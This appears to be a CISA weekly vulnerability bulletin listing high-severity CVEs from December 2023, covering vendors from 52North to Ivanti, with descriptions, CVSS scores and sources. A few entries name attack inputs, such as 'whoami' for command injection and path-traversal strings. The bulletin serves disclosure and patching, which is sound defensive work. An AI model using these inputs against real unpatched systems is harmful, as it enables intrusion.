Vulnerability Summary for the Week of December 18, 2023

Released
Dec 26, 2023
Document ID
SB23-360

The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded in the past week. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores.

Vulnerabilities are based on the Common Vulnerabilities and Exposures (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High: vulnerabilities with a CVSS base score of 7.0–10.0
  • Medium: vulnerabilities with a CVSS base score of 4.0–6.9
  • Low: vulnerabilities with a CVSS base score of 0.0–3.9

Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletin is compiled from external, open-source reports and is not a direct result of CISA analysis. 


 High Vulnerabilities

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
52north -- 52north_wpsAn XXE (XML External Entity) vulnerability has been detected in 52North WPS affecting versions prior to 4.0.0-beta.11. This vulnerability allows the use of external entities in its WebProcessingService servlet for an attacker to retrieve files by making HTTP requests to the internal network.2023-12-197.2CVE-2023-6280
cve-coordination@incibe.es
aditaas -- allied_digital_integrated_tool-as-a-serviceThe vulnerability exists in ADiTaaS (Allied Digital Integrated Tool-as-a-Service) version 5.1 due to an improper authentication vulnerability in the ADiTaaS backend API. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable platform. Successful exploitation of this vulnerability could allow the attacker to gain full access to the customers' data and completely compromise the targeted platform.2023-12-189.8CVE-2023-6483
vdisclose@cert-in.org.in
apache -- dorisThe api /api/snapshot and /api/get_log_file would allow unauthenticated access. It could allow a DoS attack or get arbitrary files from FE node. Please upgrade to 2.0.3 to fix these issues.2023-12-188.2CVE-2023-41314
security@apache.org
apache -- dubboA deserialization vulnerability existed when decode a malicious package. This issue affects Apache Dubbo: from 3.1.0 through 3.1.10, from 3.2.0 through 3.2.4. Users are recommended to upgrade to the latest version, which fixes the issue.2023-12-159.8CVE-2023-29234
security@apache.org
security@apache.org
apache -- dubboDeserialization of Untrusted Data vulnerability in Apache Dubbo. This issue only affects Apache Dubbo 3.1.5. Users are recommended to upgrade to the latest version, which fixes the issue.2023-12-159.8CVE-2023-46279
security@apache.org
security@apache.org
apache -- guacamoleApache Guacamole 1.5.3 and older do not consistently ensure that values received from a VNC server will not result in integer overflow. If a user connects to a malicious or compromised VNC server, specially-crafted data could result in memory corruption, possibly allowing arbitrary code to be executed with the privileges of the running guacd process. Users are recommended to upgrade to version 1.5.4, which fixes this issue.2023-12-198.8CVE-2023-43826
security@apache.org
security@apache.org
apache -- guacamoleWhen installing the Net2 software a root certificate is installed into the trusted store. A potential hacker could access the installer batch file or reverse engineer the source code to gain access to the root certificate password. Using the root certificate and password they could then create their own certificates to emulate another site. Then by establishing a proxy service to emulate the site they could monitor traffic passed between the end user and the site allowing access to the data content.2023-12-198.1CVE-2023-43870
cert@ncsc.nl
apache -- pulsarImproper Authentication vulnerability in Apache Pulsar WebSocket Proxy allows an attacker to connect to the /pingpong endpoint without authentication. This issue affects Apache Pulsar WebSocket Proxy: from 2.8.0 through 2.8.*, from 2.9.0 through 2.9.*, from 2.10.0 through 2.10.4, from 2.11.0 through 2.11.1, 3.0.0. The known risks include a denial of service due to the WebSocket Proxy accepting any connections, and excessive data transfer due to misuse of the WebSocket ping/pong feature. 2.10 Pulsar WebSocket Proxy users should upgrade to at least 2.10.5. 2.11 Pulsar WebSocket Proxy users should upgrade to at least 2.11.2. 3.0 Pulsar WebSocket Proxy users should upgrade to at least 3.0.1. 3.1 Pulsar WebSocket Proxy users are unaffected. Any users running the Pulsar WebSocket Proxy for 2.8, 2.9, and earlier should upgrade to one of the above patched versions.2023-12-207.5CVE-2023-37544
security@apache.org
security@apache.org
apache -- superset
 
An authenticated Gamma user has the ability to create a dashboard and add charts to it, this user would automatically become one of the owners of the charts allowing him to incorrectly have write permissions to these charts. This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2 or 2.1.3, which fixes the issue.2023-12-197.7CVE-2023-49734
security@apache.org
security@apache.org
armorxgt -- spamtrapArmorX Global Technology Corporation ArmorX Spam has insufficient validation for user input within a special function. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database.2023-12-159.8CVE-2023-48384
twcert@cert.org.tw
aveva -- edgeAn issue was discovered in ExecuteCommand() in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior that allows unauthenticated arbitrary commands to be executed.2023-12-169.8CVE-2021-42796
cve@mitre.org
cve@mitre.org
aveva -- edgePath traversal vulnerability in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior allows an unauthenticated user to steal the Windows access token of the user account configured for accessing external DB resources.2023-12-167.5CVE-2021-42797
cve@mitre.org
cve@mitre.org
awslabs -- sandbox-accounts-for-events"Sandbox Accounts for Events" provides multiple, temporary AWS accounts to a number of authenticated users simultaneously via a browser-based GUI. Authenticated users could potentially claim and access empty AWS accounts by sending request payloads to the account API containing non-existent event ids and self-defined budget & duration. This issue only affects cleaned AWS accounts, it is not possible to access AWS accounts in use or existing data/infrastructure. This issue has been patched in version 1.1.0.2023-12-227.1CVE-2023-50928
security-advisories@github.com
security-advisories@github.com
awslabs -- sandbox-accounts-for-eventsSandbox Accounts for Events provides multiple, temporary AWS accounts to a number of authenticated users simultaneously via a browser-based GUI. Authenticated users could potentially read data from the events table by sending request payloads to the events API, collecting information on planned events, timeframes, budgets and owner email addresses. This data access may allow users to get insights into upcoming events and join events which they have not been invited to. This issue has been patched in version 1.10.0.2023-12-227.8CVE-2023-51386
security-advisories@github.com
security-advisories@github.com
backupbliss -- backup_migrationThe Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server.2023-12-159.8CVE-2023-6553
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
bazarr -- bazarrBazarr manages and downloads subtitles. Prior to 1.3.1, Bazarr contains an arbitrary file read in /system/backup/download/ endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1.2023-12-157.5CVE-2023-50264
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
bazarr -- bazarrBazarr manages and downloads subtitles. Prior to 1.3.1, the /api/swaggerui/static endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1.2023-12-157.5CVE-2023-50265
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
bosch -- cpp13_firmwareA command injection vulnerability exists in Bosch IP cameras that allows an authenticated user with administrative rights to run arbitrary commands on the OS of the camera.2023-12-187.2CVE-2023-39509
psirt@bosch.com
bosch -- monitor_wallAn improper handling of a malformed API request to an API server in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation.2023-12-187.5CVE-2023-32230
psirt@bosch.com
cacti -- cactiCacti is a robust performance and fault management framework and a frontend to RRDTool - a Time Series Database (TSDB). While using the detected SQL Injection and insufficient processing of the include file path, it is possible to execute arbitrary code on the server. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the `link.php`. Impact of the vulnerability execution of arbitrary code on the server.2023-12-218CVE-2023-49084
security-advisories@github.com
cacti -- cactiCacti provides an operational monitoring and fault management framework. In versions 1.2.25 and prior, it is possible to execute arbitrary SQL code through the `pollers.php` script. An authorized user may be able to execute arbitrary SQL code. The vulnerable component is the `pollers.php`. Impact of the vulnerability - arbitrary SQL code execution. As of time of publication, a patch does not appear to exist.2023-12-228.8CVE-2023-49085
security-advisories@github.com
security-advisories@github.com
cacti -- cactiCacti provides an operational monitoring and fault management framework. Version 1.2.25 has a Blind SQL Injection (SQLi) vulnerability within the SNMP Notification Receivers feature in the file `'managers.php'`. An authenticated attacker with the "Settings/Utilities" permission can send a crafted HTTP GET request to the endpoint `'/cacti/managers.php'` with an SQLi payload in the `'selected_graphs_array'` HTTP GET parameter. As of time of publication, no patched versions exist.2023-12-228.8CVE-2023-51448
security-advisories@github.com
security-advisories@github.com
cambium_ -- epmp_force_300-25Cambium ePMP Force 300-25 version 4.7.0.1 is vulnerable to a code injection vulnerability that could allow an attacker to perform remote code execution and gain root privileges.2023-12-187.8CVE-2023-6691
ics-cert@hq.dhs.gov
clickhouse -- clickhouseClickHouse® is an open-source column-oriented database management system that allows generating analytical data reports in real-time. A heap buffer overflow issue was discovered in ClickHouse server. An attacker could send a specially crafted payload to the native interface exposed by default on port 9000/tcp, triggering a bug in the decompression logic of T64 codec that crashes the ClickHouse server process. This attack does not require authentication. Note that this exploit can also be triggered via HTTP protocol, however, the attacker will need a valid credential as the HTTP authentication take places first. This issue has been fixed in version 23.10.2.13-stable, 23.9.4.11-stable, 23.8.6.16-lts and 23.3.16.7-lts.2023-12-207CVE-2023-47118
security-advisories@github.com
clickhouse -- clickhouseClickHouse is an open-source column-oriented database management system that allows generating analytical data reports in real-time. A heap buffer overflow issue was discovered in ClickHouse server. An attacker could send a specially crafted payload to the native interface exposed by default on port 9000/tcp, triggering a bug in the decompression logic of Gorilla codec that crashes the ClickHouse server process. This attack does not require authentication. This issue has been addressed in ClickHouse Cloud version 23.9.2.47551 and ClickHouse versions 23.10.5.20, 23.3.18.15, 23.8.8.20, and 23.9.6.20.2023-12-227CVE-2023-48704
security-advisories@github.com
security-advisories@github.com
codelyfe -- stupid_simple_cmsA vulnerability, which was classified as critical, was found in codelyfe Stupid Simple CMS up to 1.2.3. This affects an unknown part of the file /terminal/handle-command.php of the component HTTP POST Request Handler. The manipulation of the argument command with the input whoami leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248259.2023-12-179.8CVE-2023-6901
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
codelyfe -- stupid_simple_cmsA vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. This vulnerability affects unknown code of the file /file-manager/upload.php. The manipulation of the argument file leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248260.2023-12-179.8CVE-2023-6902
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
codelyfe -- stupid_simple_cmsA vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /file-manager/delete.php of the component Deletion Interface. The manipulation of the argument file leads to improper authentication. The exploit has been disclosed to the public and may be used. The identifier VDB-248269 was assigned to this vulnerability.2023-12-189.1CVE-2023-6907
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
csharp -- cws_collaborative_development_platformSmartStar Software CWS is a web-based integration platform, its file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service.2023-12-159.8CVE-2023-48376
twcert@cert.org.tw
csharp -- cws_collaborative_development_platformSmartStar Software CWS is a web-based integration platform, it has a vulnerability of missing authorization and users are able to access data or perform actions that they should not be allowed to perform via commands. An authenticated with normal user privilege can execute administrator privilege, resulting in performing arbitrary system operations or disrupting service.2023-12-158.8CVE-2023-48375
twcert@cert.org.tw
cybrosys -- website_blog_searchA SQL injection vulnerability in Cybrosys Techno Solutions Website Blog Search (aka website_search_blog) v. 13.0 through 13.0.1.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the name parameter in controllers/main.py component.2023-12-159.8CVE-2023-48049
cve@mitre.org
dell -- cpg_biosDell Client BIOS contains a pre-boot direct memory access (DMA) vulnerability. An authenticated attacker with physical access to the system may potentially exploit this vulnerability in order to execute arbitrary code on the device.2023-12-227.2CVE-2023-43088
security_alert@emc.com
dell -- supportassist_client_consumerDell SupportAssist for Home PCs version 3.14.1 and prior versions contain a privilege escalation vulnerability in the installer. A local low privileged authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary executable on the operating system with elevated privileges.2023-12-227.3CVE-2023-48670
security_alert@emc.com
dlink -- dir-850l_firmwareAn issue in D-Link DIR-850L v.B1_FW223WWb01 allows a remote attacker to execute arbitrary code via a crafted script to the en parameter.2023-12-199.8CVE-2023-49004
cve@mitre.org
dromara_hertzbeat -- dromara_hertzbeatHertzbeat is an open source, real-time monitoring system. Hertzbeat uses aviatorscript to evaluate alert expressions. The alert expressions are supposed to be some simple expressions. However, due to improper sanitization for alert expressions in version prior to 1.4.1, a malicious user can use a crafted alert expression to execute any command on hertzbeat server. A malicious user who has access to alert define function can execute any command in hertzbeat instance. This issue is fixed in version 1.4.1.2023-12-227.2CVE-2023-51387
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
dromara_hertzbeat -- dromara_hertzbeatHertzbeat is an open source, real-time monitoring system. Prior to version 1.4.1, Spring Boot permission configuration issues caused unauthorized access vulnerabilities to three interfaces. This could result in disclosure of sensitive server information. Version 1.4.1 fixes this issue.2023-12-227.5CVE-2023-51650
security-advisories@github.com
security-advisories@github.com
dromara_hertzbeat -- dromara_hertzbeat
 
Hertzbeat is an open source, real-time monitoring system with custom-monitoring, high performance cluster, prometheus-like and agentless. Hertzbeat versions 1.20 and prior have a permission bypass vulnerability. System authentication can be bypassed and invoke interfaces without authorization. Version 1.2.1 contains a patch for this issue.2023-12-227.5CVE-2022-39337
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
efacec -- bcu_500Through the exploitation of active user sessions, an attacker could send custom requests to cause a denial-of-service condition on the device.2023-12-209.6CVE-2023-50707
ics-cert@hq.dhs.gov
efacec -- bcu_500A successful CSRF attack could force the user to perform state changing requests on the application. If the victim is an administrative account, a CSRF attack could compromise the entire web application.2023-12-208.2CVE-2023-6689
ics-cert@hq.dhs.gov
engelsystem -- engelsystemEnglesystem is a shift planning system for chaos events. Engelsystem prior to v3.4.1 performed insufficient validation of user supplied data for the DECT number, mobile number, and work-log comment fields. The values of those fields would be displayed in corresponding log overviews, allowing the injection and execution of Javascript code in another user's context. This vulnerability enables an authenticated user to inject Javascript into other user's sessions. The injected JS will be executed during normal usage of the system when viewing, e.g., overview pages. This issue has been fixed in version 3.4.1.2023-12-227.3CVE-2023-50924
security-advisories@github.com
security-advisories@github.com
eset,_spol._s_r.o. -- eset_nod32_antivirusImproper validation of the server's certificate chain in secure traffic scanning feature considered intermediate certificate signed using the MD5 or SHA1 algorithm as trusted.2023-12-217.5CVE-2023-5594
security@eset.com
eurotel -- etl3100EuroTel ETL3100 versions v01c01 and v01x37 does not limit the number of attempts to guess administrative credentials in remote password attacks to gain full control of the system.2023-12-199.8CVE-2023-6928
ics-cert@hq.dhs.gov
eurotel -- etl3100EuroTel ETL3100 versions v01c01 and v01x37 suffer from an unauthenticated configuration and log download vulnerability. This enables the attacker to disclose sensitive information and assist in authentication bypass, privilege escalation, and full system access.2023-12-199.4CVE-2023-6930
ics-cert@hq.dhs.gov
eurotel -- etl3100EuroTel ETL3100 versions v01c01 and v01x37 are vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers can bypass authorization, access the hidden resources on the system, and execute privileged functionalities.2023-12-197.5CVE-2023-6929
ics-cert@hq.dhs.gov
forestblog -- forestblogA vulnerability classified as critical has been found in saysky ForestBlog up to 20220630. This affects an unknown part of the file /admin/upload/img of the component Image Upload Handler. The manipulation of the argument filename leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248247.2023-12-179.8CVE-2023-6887
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
gallagher -- controller_6000A format string issue in the Controller 6000's optional diagnostic web interface can be used to write/read from memory, and in some instances crash the Controller 6000 leading to a Denial of Service. This issue affects: Gallagher Controller 6000 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior.2023-12-187.5CVE-2023-24590
disclosures@gallagher.com
getsentry -- sentry-javascriptSentry-Javascript is official Sentry SDKs for JavaScript. A ReDoS (Regular expression Denial of Service) vulnerability has been identified in Sentry's Astro SDK 7.78.0-7.86.0. Under certain conditions, this vulnerability allows an attacker to cause excessive computation times on the server, leading to denial of service (DoS). This vulnerability has been patched in sentry/astro version 7.87.0.2023-12-207.5CVE-2023-50249
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
github -- enterprise_serverImproper privilege management in all versions of GitHub Enterprise Server allows users with authorized access to the management console with an editor role to escalate their privileges by making requests to the endpoint used for bootstrapping the instance. This vulnerability affected GitHub Enterprise Server version 3.8.0 and above and was fixed in version 3.8.12, 3.9.6, 3.10.3, and 3.11.0.2023-12-218CVE-2023-46647
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
github -- enterprise_serverAn insufficient entropy vulnerability was identified in GitHub Enterprise Server (GHES) that allowed an attacker to brute force a user invitation to the GHES Management Console. To exploit this vulnerability, an attacker would need knowledge that a user invitation was pending. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program.2023-12-218.3CVE-2023-46648
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
github -- enterprise_serverAn insertion of sensitive information into log file vulnerability was identified in the log files for a GitHub Enterprise Server back-end service that could permit an `adversary in the middle attack` when combined with other phishing techniques. To exploit this, an attacker would need access to the log files for the GitHub Enterprise Server appliance, a backup archive created with GitHub Enterprise Server Backup Utilities, or a service which received streamed logs. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-218.1CVE-2023-6746
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
github -- enterprise_serverAn insertion of sensitive information into the log file in the audit log in GitHub Enterprise Server was identified that could allow an attacker to gain access to the management console. To exploit this, an attacker would need access to the log files for the GitHub Enterprise Server appliance, a backup archive created with GitHub Enterprise Server Backup Utilities, or a service which received streamed logs. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-217.2CVE-2023-6802
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
github -- enterprise_serverAn improper authentication vulnerability was identified in GitHub Enterprise Server that allowed a bypass of Private Mode by using a specially crafted API request. To exploit this vulnerability, an attacker would need network access to the Enterprise Server appliance configured in Private Mode. This vulnerability affected all versions of GitHub Enterprise Server since 3.9 and was fixed in version 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program.2023-12-217.5CVE-2023-6847
product-cna@github.com
product-cna@github.com
product-cna@github.com
gitlab -- gitlabA privilege escalation vulnerability in GitLab EE affecting all versions from 16.0 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows a project Maintainer to use a Project Access Token to escalate their role to Owner2023-12-178.8CVE-2023-3907
cve@gitlab.com
cve@gitlab.com
gitlab -- gitlabAn improper certificate validation issue in Smartcard authentication in GitLab EE affecting all versions from 11.6 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows an attacker to authenticate as another user given their public key if they use Smartcard authentication. Smartcard authentication is an experimental feature and has to be manually enabled by an administrator.2023-12-158.1CVE-2023-6680
cve@gitlab.com
gitlab -- gitlabAn issue has been discovered in GitLab EE affecting all versions starting before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible to overflow the time spent on an issue that altered the details shown in the issue boards.2023-12-157.5CVE-2023-3904
cve@gitlab.com
cve@gitlab.com
gmarczynski -- dynamic_progress_barA SQL injection vulnerability in Grzegorz Marczynski Dynamic Progress Bar (aka web_progress) v. 11.0 through 11.0.2, v12.0 through v12.0.2, v.13.0 through v13.0.2, v.14.0 through v14.0.2.1, v.15.0 through v15.0.2, and v16.0 through v16.0.2.1 allows a remote attacker to gain privileges via the recency parameter in models/web_progress.py component.2023-12-159.8CVE-2023-40954
cve@mitre.org
cve@mitre.org
grackle -- grackleGrackle is a GraphQL server written in functional Scala, built on the Typelevel stack. The GraphQL specification requires that GraphQL fragments must not form cycles, either directly or indirectly. Prior to Grackle version 0.18.0, that requirement wasn't checked, and queries with cyclic fragments would have been accepted for type checking and compilation. The attempted compilation of such fragments would result in a JVM `StackOverflowError` being thrown. Some knowledge of an applications GraphQL schema would be required to construct such a query, however no knowledge of any application-specific performance or other behavioral characteristics would be needed. Grackle uses the cats-parse library for parsing GraphQL queries. Prior to version 0.18.0, Grackle made use of the cats-parse `recursive` operator. However, `recursive` is not currently stack safe. `recursive` was used in three places in the parser: nested selection sets, nested input values (lists and objects), and nested list type declarations. Consequently, queries with deeply nested selection sets, input values or list types could be constructed which exploited this, causing a JVM `StackOverflowException` to be thrown during parsing. Because this happens very early in query processing, no specific knowledge of an applications GraphQL schema would be required to construct such a query. The possibility of small queries resulting in stack overflow is a potential denial of service vulnerability. This potentially affects all applications using Grackle which have untrusted users. Both stack overflow issues have been resolved in the v0.18.0 release of Grackle. As a workaround, users could interpose a sanitizing layer in between untrusted input and Grackle query processing.2023-12-227.5CVE-2023-50730
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
hcl_software -- hcl_bigfix_platformUnauthenticated Stored Cross-Site Scripting (XSS) vulnerability. This XSS vulnerability is in the Download Status Report, which is served by the BigFix Server. 2023-12-217.7CVE-2023-37519
psirt@hcl.com
hcl_software -- hcl_bigfix_platformUnauthenticated Stored Cross-Site Scripting (XSS) vulnerability identified in BigFix Server version 9.5.12.68, allowing for potential data exfiltration. This XSS vulnerability is in the Gather Status Report, which is served by the BigFix Relay.2023-12-217.7CVE-2023-37520
psirt@hcl.com
hewlett_packard_enterprise -- multiple_productsA potential security vulnerability has been identified in HPE Integrated Lights-Out 5 (iLO 5) and Integrated Lights-Out 6 (iLO 6). The vulnerability could be remotely exploited to allow authentication bypass.2023-12-197.5CVE-2023-50272
security-alert@hpe.com
hikvision -- intercom_broadcast_systemA vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) and classified as problematic. Affected by this issue is some unknown functionality of the file /php/exportrecord.php. The manipulation of the argument downname with the input C:\ICPAS\Wnmp\WWW\php\conversion.php leads to path traversal. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248252.2023-12-177.5CVE-2023-6893
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
hitachi_energy -- rtu500_scripting_interfaceA vulnerability exists in the component RTU500 Scripting interface. When a client connects to a server using TLS, the server presents a certificate. This certificate links a public key to the identity of the service and is signed by a Certification Authority (CA), allowing the client to validate that the remote service can be trusted and is not malicious. If the client does not validate the parameters of the certificate, then attackers could be able to spoof the identity of the service. An attacker could exploit the vulnerability by using faking the identity of a RTU500 device and intercepting the messages initiated via the RTU500 Scripting interface.2023-12-197.4CVE-2023-1514
cybersecurity@hitachienergy.com
hp -- system_management_homepageA potential security vulnerability has been identified with HP-UX System Management Homepage (SMH). This vulnerability could be exploited locally or remotely to disclose information.2023-12-177.5CVE-2023-50271
security-alert@hpe.com
ibm -- mq_applianceIBM MQ Appliance 9.3 LTS and 9.3 CD could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request to view arbitrary files on the system. IBM X-Force ID: 269536.2023-12-187.5CVE-2023-46177
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- planning_analyticsIBM Planning Analytics Local 2.0 could allow a remote attacker to upload arbitrary files, caused by the improper validation of file extensions. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious script, which could allow the attacker to execute arbitrary code on the vulnerable system. IBM X-Force ID: 265567.2023-12-228CVE-2023-42017
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- security_guardium_key_lifecycle_managerIBM Security Guardium Key Lifecycle Manager 4.3 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view modify files on the system. IBM X-Force ID: 271196.2023-12-209.1CVE-2023-47702
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- security_guardium_key_lifecycle_managerIBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to upload files of a dangerous file type. IBM X-Force ID: 271341.2023-12-208.8CVE-2023-47706
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- security_guardium_key_lifecycle_managerIBM Security Guardium Key Lifecycle Manager 4.3 contains plain text hard-coded credentials or other secrets in source code repository. IBM X-Force ID: 271220.2023-12-207.5CVE-2023-47704
psirt@us.ibm.com
psirt@us.ibm.com
idemia -- sigma_lite_firmwareThe Parameter Zone Read and Parameter Zone Write command handlers allow performing a Stack buffer overflow. This could potentially lead to a Remote Code execution on the targeted device.2023-12-159.8CVE-2023-33218
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia -- sigma_lite_firmwareThe handler of the retrofit validation command doesn't properly check the boundaries when performing certain validation operations. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device2023-12-159.8CVE-2023-33219
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia -- sigma_lite_firmwareDuring the retrofit validation process, the firmware doesn't properly check the boundaries while copying some attributes to check. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device2023-12-159.8CVE-2023-33220
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia -- sigma_lite_firmwareWhen reading DesFire keys, the function that reads the card isn't properly checking the boundaries when copying internally the data received. This allows a heap based buffer overflow that could lead to a potential Remote Code Execution on the targeted device. This is especially problematic if you use Default DESFire key.2023-12-159.8CVE-2023-33221
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia -- sigma_lite_firmwareBy abusing a design flaw in the firmware upgrade mechanism of the impacted terminal it's possible to cause a permanent denial of service for the terminal. the only way to recover the terminal is by sending back the terminal to the manufacturer2023-12-157.5CVE-2023-33217
a87f365f-9d39-4848-9b3a-58c7cae69cab
imou -- imou_life_appA session hijacking vulnerability has been detected in the Imou Life application affecting version 6.7.0. This vulnerability could allow an attacker to hijack user accounts due to the QR code functionality not properly filtering codes when scanning a new device and directly running WebView without prompting or displaying it to the user. This vulnerability could trigger phishing attacks.2023-12-198.1CVE-2023-6913
cve-coordination@incibe.es
infinispan -- infinispanA flaw was found in Infinispan. When serializing the configuration for a cache to XML/JSON/YAML, which contains credentials (JDBC store with connection pooling, remote store), the credentials are returned in clear text as part of the configuration.2023-12-187.2CVE-2023-5384
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
istanbul_soft_informatics_and_consultancy_limited_company -- softomi_advanced_c2c_marketplace_softwareImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in İstanbul Soft Informatics and Consultancy Limited Company Softomi Advanced C2C Marketplace Software allows SQL Injection. This issue affects Softomi Advanced C2C Marketplace Software: before 12122023.2023-12-219.8CVE-2023-6145
iletisim@usom.gov.tr
itpison -- omicard_edmITPison OMICARD EDM's file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload and run arbitrary executable files to perform arbitrary system commands or disrupt service.2023-12-159.8CVE-2023-48371
twcert@cert.org.tw
itpison -- omicard_edmITPison OMICARD EDM 's SMS-related function has insufficient validation for user input. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database.2023-12-159.8CVE-2023-48372
twcert@cert.org.tw
itpison -- omicard_edmITPison OMICARD EDM has a path traversal vulnerability within its parameter "FileName" in a specific function. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.2023-12-157.5CVE-2023-48373
twcert@cert.org.tw
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-41727
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46216
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46217
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46220
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46221
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46222
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46223
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46224
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46225
support@hackerone.com
